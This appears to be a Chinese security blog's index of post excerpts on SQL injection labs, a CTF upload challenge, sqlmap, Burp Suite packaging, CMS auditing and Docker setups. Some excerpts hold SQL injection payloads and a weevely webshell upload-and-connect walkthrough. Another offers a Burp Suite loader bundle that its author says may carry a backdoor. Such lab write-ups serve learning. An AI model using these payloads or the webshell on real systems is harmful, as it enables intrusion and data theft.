延时注学习
SQL盲注:基于时间延迟注入 靶场环境搭建 所需软件Phpstudy2016,sql注入靶场文件 Phpstduy 官网下载地址:https://www.xp.cn/sql注入靶场下载地址:https://github.com/Audi-1/sqli-labs 下载安装 phpstudy,下载sql注入靶场文件压缩包, 解压文件靶场环境文件,放到 phpstudy 文件目录下的 WWW 文件夹下, 然后运行 phpstudy 然后访问,http://localhost/,或者 http://127.0.0.1 点击 Setup/reset Database for labs 选项安装靶场数据库等文件 出现这个就说明安装完成 返回访问 http://127.0.0.1 主页就行 对照 ascii 表 控制字符 ASCII 值 控制字符 ASCII 值 控制字符 ASCII 值 控制字符 NUT 32 (space) 64 @ 96 、 SOH 33 ! 65 A 97 a STX 34 “ 66 B 98 b ETX 35 # 67 C 99 c ...
上传漏洞
上传漏洞 首先,标题是upload,提示就是上传漏洞无非就是js拦截,代码拦截,看了以下网页head头,发现js代码,关键字jpg burpsuite 抓包,配置代理 weevely 生成一句话 weevely generate password ./1.php #use weevely在当前目录生成1.php,密码passwdmv 1.php 1.php.jpg 选择文件上传 && burpsuite 抓包 删掉.jpg 回显 upload success : upload/1592555994.1.php weevely 连接 weevely http://220.249.52.133:57535/upload/1592554838.1.php password # weevely 连接dir # 显示目录cd ../..发现flag.phpcat flag.php 得到flag 推荐一个上传漏洞的靶场:https://github.com/c0ny1/upload-labs
安全笔记
安全笔记 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema='security' 查列:select column_name from information_schema.columns where table_name='users' 查字段:select username,password from security.users sqli-lib实践less-01:SELECT * FROM users WHERE id='1' LIMIT 0,1;select SELECT limit 0,1; 其中第一位是从第几个开始,比如0代表从第一个开始,而第二位的1代表的就是显示多少个数据。SELECT * FROM users WHERE id='1' or 1=1-- ...
Bugku-web指南
bugku靶场webweb1https://segmentfault.com/a/1190000016750234 知识基础 涉及到的几个函数: 1.$_REQUEST: 可以获取以POST方法和GET方法提交的数据,但是速度比较慢 2.eval: 把字符串按照 PHP 代码来计算,该字符串必须是合法的 PHP 代码,且必须以分号结尾。 <?phpeval("echo'hello';echo' world';");?># outputhello world 3.var_dump: 函数用于输出变量的相关信息 # 数字var_dump(1); > int(1)# 字符串var_dump("string"); > string(6) "string" 解题思路 eval应该是此题的突破口,能够执行php代码。 hello是接受参数的变量,接下来就是构建hello变量,使其能够闭合var_dump,利用print_r输出 首先闭合var_dump: 1)& ...
随机笔记
按钮弹出文字 <script type="text/javascript"> function a(){ alert("看你大爷"); } </script> <input type="button" value=按钮弹出文字 onClick="javascript:a()"> 表格 加粗 <strong> 倾斜 <em><i> 删除线 <del><s> 下划线 <ins><u> 盒子 <div 占一行><span 跨距> 图像 ...
Windows 安全渗透工具配置.MD
Windows 安全渗透工具配置 请在Windows环境变量中添加 存放脚本的文件夹路劲,建议 onedriver WIN + E >> 此电脑 > 属性 > 高级系统设置 > 高级 > 环境变量 > 系统变量 > PATH > 新建 > 存放脚本的路劲 工具推荐python换源 pip config set global.index-url https://mirrors.aliyun.com/pypi/simple Wiresharkwireshark.org 安装的时候勾选一下拓展项目,优先安装 Sqlmapgithub sqlmapproject/sqlmap # sqlmap/lib/core/settings.py# 新版在第27行DEFAULT_USER_AGENT = 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'# sqlmap\data\tx ...
sqlmap的使用介绍
# 一、sqlmap获取目标 1.sql注入介绍所谓SQL注入,就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将SQL命令注入到后台数据库引擎执行的能力,它可以通过在web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。SQL注入可能发生在未知HTTP数据包中任意位置。创建本地服务后,访问子页面/sqli-labs,点击Less-1,加入参数**?id=2**,会返回登录名和密码到网页上,如图 2.SQL输出级别Sqlmap的输出信息按从简到繁共分为7个级别依次为0、1、2、3、4、5和6。使用参数-v来指定某个等级,如使用参数 -v 6来指定输出级别为6。 0:只显示Python的tracebacks信息、错误信息[ERROR]和关键信息[CRITICAL] 1:同时显示普通信息[INFO]和警告信息[WARNING] 2:同时显示调试信息[DEBUG] 3:同时显示注入使用的攻击荷载 4:同时显示HTTP请求头 5:同时显示HTTP ...
App exe 封装教程
App exe 封装教程jpackageBurp-Suite-Launch IdeaProjects/Burp-Suite-Launch/src/burpsuite/Main.java package burpsuite;public class Main { public static void main(String[] args) { new Main().shell(); } public String getPath() { String path = this.getClass().getProtectionDomain().getCodeSource().getLocation().getPath(); if (System.getProperty("os.name").contains("dos")) { path = path.substring(1); } ...
Burp-Suite 集合打包
Burp-Suite 集合打包预览 下载地址 百度云盘:skmh有无后门,请君自测 –💖 Windows Old-Burp-Suite.vbs Burp-Suite-Win.vbs license.cmd Linux Burp-Suite-Linux.sh Burp-Suite-Linux-Arm.sh ./jdk-linux11/bin/java -noverify -jar BurpSuiteLoader.jar ./jdk-linux-arm11/bin/java -noverify -jar BurpSuiteLoader.jar 建议配合 screen 或者 & 效果更佳 Mac Burp-Suite-Mac.zip vi /etc/profileGexport burpsuite=/Users/xr/Documents/Burp-Suiteexport PATH=$PATH:$burpsuite/:wqecho -e '$burpsuite/jdk-mac11/Contents/Home/bin/java -noverify -javaagen ...
天目MVC审计二
天目MVC审计二 本文章由二农戏猪编辑 审计控制器从上一篇审计完了入口文件和搞清楚路由规则之后,我们开始正式审计控制器。 Home目录从app/home/index.php开始审计,前面没什么可说的,但是注意这里,虽然它是判断不是PC登陆时候执行,但是我们可以看到它调用的查询方法,感觉很熟悉,比较像think里面定义的查询方法,我们回想起上一篇审计的时候,审计到的过滤机制,我们全局搜索一下where(,一个一个去查看,看看是否有where条件为两个参数,或者int类型。 后台SQL注入功夫不负有心人,我们在此处,发现$sid未被单引号包裹,并且未被强制转换未int类型。目录为admin\controller\special.php,我们尝试复现。好的一处SQL注入漏洞。 前台SQL注入正当我以为没有前台SQL注入的时候,突然间,有发现了一个位置。突然间想起一句话:缘,妙不可言。 找一下。看看$sid怎么传进来的,是否可控 全局搜一下这个get_category_list(),发现在home/controller/special.php中,category()这个方法中,通过 ...
天目MVC审计一
天目MVC审计一前言 我们今天来从零开始审计一款CMS:天目CMS本文章由二农戏猪编辑 天目CMS 官网 MVC架构的了解 MVC架构一般包括三个部分:M是指业务模型,V是指用户界面,C则是控制器。具体情况大家可以百度查看。 根据我们对于MVC的了解。我一般有两种审计模式: 直接审计控制器也就C的内容,再追踪一些函数。全局搜索一下filt__,因为 filt 的英文意思为过滤,可以通过全局搜索这样式的函数来查看一下过滤规则。这种一般是比较快速审计。 但是这种情况一般建立在你可以清晰明白该款CMS的路由规则,适合老鸟,方便根据审计出来的漏洞的点去回溯验证 从index页面通读审计这种审计方式是我认为像我这样的菜鸡比较合适的。也不容易忽略一些漏洞。该篇文章就是以这种方式审计的! 开始审计准备在审计开始时,我一般习惯于观察一下目录列表,从而可以对整个CMS有一个大概的了解: app ----------------------------------- 主程序目录attachment ---------------------------- 附加目录public -------- ...
code-server vscode arm
Code-server vscode xdebug arm This is an article I gave up 由于Apple M1 arm版无法使用我上期发布的 vscode 版本,所以写了这篇文章 好吧,下面的我放弃了,你们直接用我做好的Well, I’ll give up the next one. You can use the one I made aliyundocker run -it -d \--name vs-db \-p 31005:3306 \--hostname vs-db \-e "MYSQL_ROOT_PASSWORD=123456" \mariadb:latestdocker run -it -d \--name vscode \-v /yourpath/www/html:/www/wwwroot/html \-p 31001:8080 \-p 31002:22 \-p 31003:80 \-p 31004:5050 \--hostname vscode \--link vs-db \registry.cn-hangzhou.a ...
在线vscode 配置 php xdebug code-server
在线 vscode 配置 php xdebug code-server Arm 版请看 code-server vscode arm 通知 xdebug 请添加 xdebug.remote_autostart = 1Notify Xdebug to add xdebug.remote_ autostart = 1 检查/root/code-server/path中的文件Check the files in / root / code server / path View Installaliyundocker run -it -d \--name vs-db \-p 8003:3306 \--hostname vs-db \-e "MYSQL_ROOT_PASSWORD=123456" \mariadb:latestdocker run -it -d \--name vscode \-v /yourpath/www/html:/var/www/html \-p 31001:8080 \-p 31002:80 \-p 31003:22 \--hostname v ...
Phpstorm docker php74-56 nginx mariadb
Phpstorm docker php74-56 nginx db Phpstorm 折磨的我头很大,难受 Docker 配置 version: "3"services: db: hostname: db image: mariadb:latest container_name: db restart: on-failure:3 volumes: - ./server/db:/var/lib/mysql ports: - 31004:3306 command: --transaction-isolation=READ-COMMITTED --binlog-format=ROW environment: - MYSQL_ROOT_PASSWORD=123456 - MYSQL_PASSWORD=123456 - MYSQL_DATABASE=test - MYSQL_USER=test # php: # hostname: p ...
Docker命令
Docker 基本命令 docker imagesdocker login --username=user@qq.com registry.cn-hangzhou.aliyuncs.comdocker tag 23d07257d553 registry.cn-hangzhou.aliyuncs.com/user/awvs-nessus:latestdocker push registry.cn-hangzhou.aliyuncs.com/user/awvs-nessus:latest Docker 命令 /usr/syno/sbin/synoservice --restart pkgctl-Docker docker commit [OPTIONS] CONTAINER [REPOSITORY[:TAG]] docker commit id name docker-compose up -d docker exec -it 容器:/bin/bash docker logs 容器 docker image puxxx -af # 你tab一下 docker image inxxx | ...